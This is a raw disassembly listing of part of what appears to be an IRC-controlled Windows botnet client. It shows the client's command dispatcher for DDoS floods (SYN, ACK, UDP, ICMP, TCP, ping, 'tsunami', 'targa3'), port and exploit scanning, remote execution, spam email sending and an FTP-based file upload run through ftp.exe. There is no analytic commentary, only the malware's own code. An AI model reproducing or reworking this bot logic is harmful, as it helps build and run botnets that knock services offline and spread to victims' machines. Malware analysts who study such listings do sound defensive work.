push [ebp+arg_8] ; Str2
push offset aC_n ; "c_n"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408900
push [ebp+arg_8] ; Str2
push offset aC_join ; "c_join"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4088DA
push [ebp+arg_8] ; Str2
push offset aC_j ; "c_j"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4088DA
push [ebp+arg_8] ; Str2
push offset aC_part ; "c_part"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40887A
push [ebp+arg_8] ; Str2
push offset aC_p ; "c_p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40887A
push [ebp+arg_8] ; Str2
push offset aTarga3 ; "targa3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40877F
push [ebp+arg_8] ; Str2
push offset aT3 ; "t3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40877F
push [ebp+arg_8] ; Str2
push offset aTsunami ; "tsunami"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4086AA
push [ebp+arg_8] ; Str2
push offset aTsn ; "tsn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4086AA
push [ebp+arg_8] ; Str2
push offset aRepeat ; "repeat"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4085A5
push [ebp+arg_8] ; Str2
push offset aRp ; "rp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4085A5
push [ebp+arg_8] ; Str2
push offset aDelay ; "delay"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408508
push [ebp+arg_8] ; Str2
push offset aDe ; "de"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408508
push [ebp+arg_8] ; Str2
push offset aHadeth3 ; "HADETH3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408379
push [ebp+arg_8] ; Str2
push offset aHadeth3 ; "HADETH3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408379
push [ebp+arg_8] ; Str2
push offset aExecute ; "execute"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082E6
push [ebp+arg_8] ; Str2
push offset aE ; "e"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4082E6
push [ebp+arg_8] ; Str2
push offset aFindfile ; "findfile"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081D7
push [ebp+arg_8] ; Str2
push offset aFf ; "ff"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4081D7
push [ebp+arg_8] ; Str2
push offset aRename ; "rename"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408160
push [ebp+arg_8] ; Str2
push offset aMv ; "mv"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408160
push [ebp+arg_8] ; Str2
push offset aIcmpflood ; "icmpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408063
push [ebp+arg_8] ; Str2
push offset aIcmp ; "icmp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_408063
mov eax, [ebp+esi+Str2]
cmp eax, ebx
mov [ebp+Src], eax
jz loc_401F75
push [ebp+arg_8] ; Str2
push offset aClone_0 ; "clone"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407F7B
push [ebp+arg_8] ; Str2
push offset aC ; "c"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407F7B
push [ebp+arg_8] ; Str2
push offset aDdos_syn ; "ddos.syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407E82
push [ebp+arg_8] ; Str2
push offset aDdos_ack ; "ddos.ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407E82
push [ebp+arg_8] ; Str2
push offset aDdos_random ; "ddos.random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407E82
push [ebp+arg_8] ; Str2
push offset aWisdom_udp ; "wisdom.udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4066AE
push 7Fh
lea eax, [ebp+var_3280]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3200]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3180]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3100]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3078], eax
push ebx ; int
lea eax, [ebp+Dst]
push 13h ; int
push eax ; Source
mov [ebp+var_307C], edi
mov [ebp+var_3284], esi
call sub_40B3BA
add esp, 3Ch
mov [ebp+var_3080], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3284]
push ebx
push eax
push offset sub_41525A
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3080]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40669D
loc_406687: ; CODE XREF: sub_401ACD+4BCE�j
cmp [ebp+var_3074], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_406687
; ---------------------------------------------------------------------------
loc_40669D: ; CODE XREF: sub_401ACD+4BB8�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42B0E0
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_4066AE: ; CODE XREF: sub_401ACD+4B0E�j
push [ebp+arg_8] ; Str2
push offset aSynflood ; "synflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407D9A
push [ebp+arg_8] ; Str2
push offset aSyn ; "syn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407D9A
push [ebp+arg_8] ; Str2
push offset aSkysyn ; "skysyn"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4067DB
push 7Fh
lea eax, [ebp+var_36A8]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3628]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_35A8]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3528]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_34A4], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_34A0], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_36AC], esi
push edi
push offset asc_42B098 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 10h ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_34A8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_36AC]
push ebx
push eax
push offset sub_4141B2
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_34A8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4067CA
loc_4067B4: ; CODE XREF: sub_401ACD+4CFB�j
cmp [ebp+var_349C], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4067B4
; ---------------------------------------------------------------------------
loc_4067CA: ; CODE XREF: sub_401ACD+4CE5�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42B05C
jmp loc_407187
; ---------------------------------------------------------------------------
loc_4067DB: ; CODE XREF: sub_401ACD+4C20�j
push [ebp+arg_8] ; Str2
push offset aPhatwonk ; "phatwonk"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407CB2
push [ebp+arg_8] ; Str2
push offset aWonk ; "wonk"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407CB2
push [ebp+arg_8] ; Str2
push offset aNazel3 ; "NAZEL3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407B74
push [ebp+arg_8] ; Str2
push offset aNazel3 ; "NAZEL3"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407B74
push [ebp+arg_8] ; Str2
push offset aRedirect ; "redirect"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407A77
push [ebp+arg_8] ; Str2
push offset aRd ; "rd"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407A77
push [ebp+arg_8] ; Str2
push offset aScan_0 ; "scan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407984
push [ebp+arg_8] ; Str2
push offset aSc ; "sc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407984
push [ebp+arg_8] ; Str2
push offset aC_privmsg ; "c_privmsg"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407887
push [ebp+arg_8] ; Str2
push offset aC_pm ; "c_pm"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407887
push [ebp+arg_8] ; Str2
push offset aC_action ; "c_action"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407797
push [ebp+arg_8] ; Str2
push offset aC_a ; "c_a"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407797
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+Source], eax
jz loc_401F75
push [ebp+arg_8] ; Str2
push offset aPortscan ; "portscan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407691
push [ebp+arg_8] ; Str2
push offset aPsc ; "psc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_407691
push [ebp+arg_8] ; Str2
push offset aAdvscan ; "advscan"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4071B6
push [ebp+arg_8] ; Str2
push offset aAd ; "ad"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4071B6
push [ebp+arg_8] ; Str2
push offset aUdpflood ; "udpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40706D
push [ebp+arg_8] ; Str2
push offset aUdp ; "udp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40706D
push [ebp+arg_8] ; Str2
push offset aU ; "u"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_40706D
push [ebp+arg_8] ; Str2
push offset aNetsend ; "netsend"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406F5F
push [ebp+arg_8] ; Str2
push offset aNs ; "ns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406F5F
push [ebp+arg_8] ; Str2
push offset aPingflood ; "pingflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406E35
push [ebp+arg_8] ; Str2
push offset aPing_0 ; "ping"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406E35
push [ebp+arg_8] ; Str2
push offset aP ; "p"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406E35
push [ebp+arg_8] ; Str2
push offset aVnchost ; "vnchost"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_406A5A
push edi
call sub_41B52C
pop ecx
lea eax, [ebp+Dst]
push edi
push offset aVncHttpHostCha ; "VNC: HTTP Host Changed To: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_401F75
push ebx
lea eax, [ebp+Dst]
push [ebp+var_4]
push eax
jmp loc_4040AB
; ---------------------------------------------------------------------------
loc_406A5A: ; CODE XREF: sub_401ACD+4F56�j
push [ebp+arg_8] ; Str2
push offset aTcpflood ; "tcpflood"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406C8E
push [ebp+arg_8] ; Str2
push offset aTcp ; "tcp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_406C8E
push [ebp+arg_8] ; Str2
push offset aEmail ; "email"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_406C36
lea eax, [ebp+var_46F0]
push edi ; Source
push eax ; Dest
call _strcpy
push [ebp+arg_18] ; Str
call _atoi
push [ebp+Src] ; Source
mov [ebp+arg_18], eax
lea eax, [ebp+var_438C]
push eax ; Dest
call _strcpy
push [ebp+Source] ; Source
lea eax, [ebp+var_458C]
push eax ; Dest
call _strcpy
push offset asc_42CDC0 ; " "
push offset a_ ; "_"
push [ebp+esi+var_7C] ; Src
call sub_41843B
push eax ; Source
lea eax, [ebp+var_408C]
push eax ; Dest
call _strcpy
add esp, 30h
lea eax, [ebp+var_528C]
push eax
push 101h
call dword_4CB944 ; WSAStartup
lea eax, [ebp+var_46F0]
push eax
call dword_4CBA58 ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_4CBA54 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_31C], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_318], eax
call dword_4CB9D4 ; htons
mov [ebp+var_31A], ax
lea eax, [ebp+var_408C]
push eax
lea eax, [ebp+var_438C]
push eax
lea eax, [ebp+var_408C]
push eax
lea eax, [ebp+var_458C]
push eax
lea eax, [ebp+var_438C]
push eax
lea eax, [ebp+var_568C]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax ; Dest
call _sprintf
add esp, 1Ch
lea eax, [ebp+var_31C]
push 10h
push eax
push esi
call dword_4CB97C ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_448C]
push edi
push eax
push esi
call dword_4CB9EC ; recv
lea eax, [ebp+var_448C]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_568C]
push eax
push esi
call dword_4CBA24 ; send
push ebx
lea eax, [ebp+var_448C]
push edi
push eax
push esi
call dword_4CB9EC ; recv
push esi
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
lea eax, [ebp+var_458C]
push eax
push offset asc_42AEFC ; "-"
loc_406BEF: ; CODE XREF: sub_401ACD+2E3F�j
; sub_401ACD+4561�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
loc_406BFB: ; CODE XREF: sub_401ACD+2431�j
add esp, 0Ch
loc_406BFE: ; CODE XREF: sub_401ACD+4485�j
; sub_401ACD+6575�j ...
cmp [ebp+var_8], ebx
jnz short loc_406C1F
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_406C1F: ; CODE XREF: sub_401ACD+296F�j
; sub_401ACD+29C2�j ...
mov esi, [ebp+File]
loc_406C22: ; CODE XREF: sub_401ACD+6814�j
; sub_401ACD+773F�j ...
lea eax, [ebp+Dst]
push eax
call sub_415D38
pop ecx
mov eax, esi
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_406C36: ; CODE XREF: sub_401ACD+4FCC�j
push [ebp+arg_8] ; Str2
push offset aHttpcon ; "httpcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406C60
push [ebp+arg_8] ; Str2
push offset aHcon ; "hcon"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_407208
loc_406C60: ; CODE XREF: sub_401ACD+517A�j
push [ebp+esi+var_7C] ; int
push [ebp+Source] ; int
push [ebp+Src] ; int
push [ebp+arg_18] ; Str
call _atoi
pop ecx
push eax ; int
push edi ; int
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_410ADC
jmp loc_404085
; ---------------------------------------------------------------------------
loc_406C8E: ; CODE XREF: sub_401ACD+4F9E�j
; sub_401ACD+4FB5�j
mov esi, 80h
push edi ; Format
lea eax, [ebp+var_1358]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+var_1358]
push eax ; Str2
push offset aSyn ; "syn"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_406CF1
lea eax, [ebp+var_1358]
push eax ; Str2
push offset aAck ; "ack"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406CF1
lea eax, [ebp+var_1358]
push eax ; Str2
push offset aRandom_0 ; "random"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_406CF1
push offset unk_42AEB4
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_406CF1: ; CODE XREF: sub_401ACD+51EA�j
; sub_401ACD+5201�j ...
push [ebp+Source] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_1250], eax
jle loc_406E1D
push edi ; Format
lea eax, [ebp+var_1358]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_13D8]
push [ebp+arg_18] ; Format
push esi ; Count
push eax ; Dest
call __snprintf
push [ebp+Src] ; Str
call _atoi
mov [ebp+var_1254], eax
add esp, 10h
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+Format] ; Format
setnz al
mov [ebp+var_124C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_13DC], eax
lea eax, [ebp+var_12D8]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_124C], ebx
mov [ebp+var_1248], eax
mov eax, [ebp+var_8]
mov [ebp+var_1244], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_406D8E
mov eax, offset aNormal ; "Normal"
loc_406D8E: ; CODE XREF: sub_401ACD+52BA�j
push [ebp+Source]
push [ebp+Src]
push [ebp+arg_18]
push edi
push eax
push offset asc_42AE70 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 14h ; int
push eax ; Source
call sub_40B3BA
add esp, 2Ch
mov [ebp+var_1258], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_13DC]
push ebx
push eax
push offset sub_4149C1
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1258]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_406E0C
loc_406DF6: ; CODE XREF: sub_401ACD+533D�j
cmp [ebp+var_1240], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_406DF6
; ---------------------------------------------------------------------------
loc_406E0C: ; CODE XREF: sub_401ACD+5327�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AE38
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_406E1D: ; CODE XREF: sub_401ACD+5235�j
push offset asc_42AE00 ; "-"
loc_406E22: ; CODE XREF: sub_401ACD+1FBE�j
; sub_401ACD+1FD4�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_4081AD
; ---------------------------------------------------------------------------
loc_406E35: ; CODE XREF: sub_401ACD+4F11�j
; sub_401ACD+4F28�j ...
cmp dword_4CBAC4, ebx
jnz loc_406F44
mov eax, [ebp+var_8]
push 7Fh ; Count
mov [ebp+var_FF8], eax
mov eax, [ebp+var_4]
mov [ebp+var_FFC], eax
lea eax, [ebp+var_1090]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+arg_18] ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_1010], eax
call _atoi
push [ebp+Source] ; Str
mov [ebp+var_100C], eax
call _atoi
push 7Fh ; Count
mov [ebp+var_1008], eax
push [ebp+Format] ; Source
lea eax, [ebp+var_1110]
push eax ; Dest
call _strncpy
mov eax, [ebp+arg_4]
add esp, 24h
mov [ebp+var_1114], eax
lea eax, [ebp+var_1090]
push [ebp+var_1008]
push [ebp+var_100C]
push eax
lea eax, [ebp+Dst]
push [ebp+var_1010]
push offset asc_42ADB8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 16h ; int
push eax ; Source
call sub_40B3BA
add esp, 24h
mov [ebp+var_1000], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1114]
push ebx
push eax
push offset sub_413E10
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1000]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_406F33
loc_406F1D: ; CODE XREF: sub_401ACD+5464�j
cmp [ebp+var_FF4], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_406F1D
; ---------------------------------------------------------------------------
loc_406F33: ; CODE XREF: sub_401ACD+544E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AD80
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_406F44: ; CODE XREF: sub_401ACD+536E�j
push 1FFh ; Count
lea eax, [ebp+Dst]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax ; Dest
call _strncpy
jmp loc_4081AA
; ---------------------------------------------------------------------------
loc_406F5F: ; CODE XREF: sub_401ACD+4EE3�j
; sub_401ACD+4EFA�j
push [ebp+arg_18]
lea eax, [ebp+Dst]
push edi
push [ebp+Src]
push offset asc_42AD2C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
push [ebp+Src] ; Str
call _strlen
push [ebp+arg_18] ; Str
mov edi, eax
call _strlen
push [ebp+arg_20] ; Str
add edi, eax
call _strlen
push [ebp+arg_8] ; Str
add edi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Source] ; SubStr
lea eax, [eax+edi+7]
push eax ; Str
call _strstr
add esp, 40h
mov [ebp+arg_C], eax
push [ebp+Src] ; Str
call _atoi
mov edi, [ebp+arg_20]
cmp eax, ebx
pop ecx
mov [ebp+arg_14], eax
mov [ebp+arg_1C], ebx
jle short loc_407059
loc_406FE2: ; CODE XREF: sub_401ACD+5539�j
push [ebp+arg_C] ; int
push [ebp+arg_18] ; int
push edi ; Source
call sub_418AF1
add esp, 0Ch
cmp eax, 1
mov [ebp+arg_20], eax
jz short loc_40700A
cmp eax, ebx
jnz short loc_407029
inc [ebp+arg_1C]
mov eax, [ebp+arg_1C]
cmp eax, [ebp+arg_14]
jl short loc_406FE2
jmp short loc_407062
; ---------------------------------------------------------------------------
loc_40700A: ; CODE XREF: sub_401ACD+552A�j
push ebx ; int
push [ebp+var_4] ; int
push offset unk_42ACF4 ; int
loc_407013: ; CODE XREF: sub_401ACD+559E�j
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
jmp loc_407208
; ---------------------------------------------------------------------------
loc_407029: ; CODE XREF: sub_401ACD+552E�j
push [ebp+arg_20]
lea eax, [ebp+Dst]
push offset asc_42ACC0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 20h
loc_407059: ; CODE XREF: sub_401ACD+5513�j
cmp [ebp+arg_20], ebx
jnz loc_407208
loc_407062: ; CODE XREF: sub_401ACD+553B�j
push ebx
push [ebp+var_4]
push offset unk_42AC8C
jmp short loc_407013
; ---------------------------------------------------------------------------
loc_40706D: ; CODE XREF: sub_401ACD+4E9E�j
; sub_401ACD+4EB5�j ...
mov eax, [ebp+var_8]
push 7Fh ; Count
mov [ebp+var_C68], eax
mov eax, [ebp+var_4]
loc_40707B: ; DATA XREF: .data:004330E0�o
; .data:004330F4�o ...
mov [ebp+var_C6C], eax
lea eax, [ebp+var_D00]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+arg_18] ; Str
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_C80], eax
call _atoi
push [ebp+Source] ; Str
mov [ebp+var_C7C], eax
call _atoi
mov esi, [ebp+esi+var_7C]
add esp, 18h
cmp esi, ebx
mov [ebp+var_C78], eax
jz short loc_4070D2
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_C74], eax
jmp short loc_4070D8
; ---------------------------------------------------------------------------
loc_4070D2: ; CODE XREF: sub_401ACD+55F4�j
mov [ebp+var_C74], ebx
loc_4070D8: ; CODE XREF: sub_401ACD+5603�j
push 7Fh ; Count
lea eax, [ebp+var_D80]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
mov esi, [ebp+arg_4]
lea eax, [ebp+var_D00]
mov [ebp+var_D84], esi
push [ebp+var_C78]
push [ebp+var_C7C]
push eax
lea eax, [ebp+Dst]
push [ebp+var_C80]
push offset asc_42AC44 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 17h ; int
push eax ; Source
call sub_40B3BA
add esp, 24h
mov [ebp+var_C70], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_D84]
push ebx
push eax
push offset sub_413F9C
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_C70]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40717B
loc_407169: ; CODE XREF: sub_401ACD+56AC�j
cmp [ebp+var_C64], ebx
jnz short loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407169
; ---------------------------------------------------------------------------
loc_40717B: ; CODE XREF: sub_401ACD+569A�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset asc_42AC0C ; "-"
loc_407187: ; CODE XREF: sub_401ACD+4D09�j
; sub_401ACD+61E0�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_407196: ; CODE XREF: sub_401ACD+4CED�j
; sub_401ACD+56A2�j ...
cmp [ebp+var_8], ebx
jnz loc_4082DE
push ebx
push [ebp+var_4]
loc_4071A3: ; CODE XREF: sub_401ACD+2284�j
lea eax, [ebp+Dst]
push eax
push [ebp+Format]
push esi
jmp loc_4081CA
; ---------------------------------------------------------------------------
loc_4071B6: ; CODE XREF: sub_401ACD+4E70�j
; sub_401ACD+4E87�j
push 0Bh
call sub_40B602
push [ebp+arg_18] ; Str
mov [ebp+arg_1C], eax
call _atoi
add eax, [ebp+arg_1C]
pop ecx
pop ecx
cmp eax, 320h
jle loc_407381
push [ebp+arg_1C]
lea eax, [ebp+Dst]
push offset unk_42ABD0 ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 20h
loc_407208: ; CODE XREF: sub_401ACD+518D�j
; sub_401ACD+5557�j ...
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz loc_401F75
push [ebp+arg_8] ; Str2
push offset aUpload ; "upload"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_409644
push 4
push esi
call sub_416CAF
pop ecx
test eax, eax
pop ecx
jnz short loc_407253
push esi
push offset asc_42ABA8 ; "-"
loc_40723F: ; CODE XREF: sub_401ACD+711E�j
; sub_401ACD+796B�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_407253: ; CODE XREF: sub_401ACD+576A�j
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
push 9
cdq
pop ecx
idiv ecx
push edx
call _rand
push 63h
cdq
pop ecx
idiv ecx
push edx
call _rand
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_50FC]
push edx
push eax
lea eax, [ebp+Filename]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax ; Dest
call _sprintf
lea eax, [ebp+Filename]
push offset Mode ; "ab"
push eax ; Filename
call _fopen
add esp, 20h
cmp eax, ebx
mov [ebp+File], eax
jz loc_401F75
push esi
push [ebp+Source]
push [ebp+Src]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax ; File
call _fprintf
push [ebp+File] ; File
call _fclose
add esp, 20h
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+var_4CF8]
push offset aSS_2 ; "-s:%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4CF8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_4CB940
test eax, eax
push edi
push esi ; Format
jz short loc_407320
push offset unk_42AB38
jmp short loc_407325
; ---------------------------------------------------------------------------
loc_407320: ; CODE XREF: sub_401ACD+584A�j
push offset asc_42AB08 ; "-"
loc_407325: ; CODE XREF: sub_401ACD+5851�j
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40734E
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_40734E: ; CODE XREF: sub_401ACD+5863�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
loc_40735A: ; CODE XREF: sub_401ACD+58B2�j
lea eax, [ebp+Filename]
push 4
push eax
call sub_416CAF
add esp, 0Ch
test eax, eax
jz loc_401F75
lea eax, [ebp+Filename]
push eax
call sub_41C7BC
jmp short loc_40735A
; ---------------------------------------------------------------------------
loc_407381: ; CODE XREF: sub_401ACD+5705�j
push edi ; Str
call _atoi
push [ebp+arg_18] ; Str
mov [ebp+var_370], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_358], eax
call _atoi
add esp, 0Ch
cmp eax, 5
mov [ebp+var_36C], eax
jnb short loc_4073BA
push 5
pop eax
mov [ebp+var_36C], eax
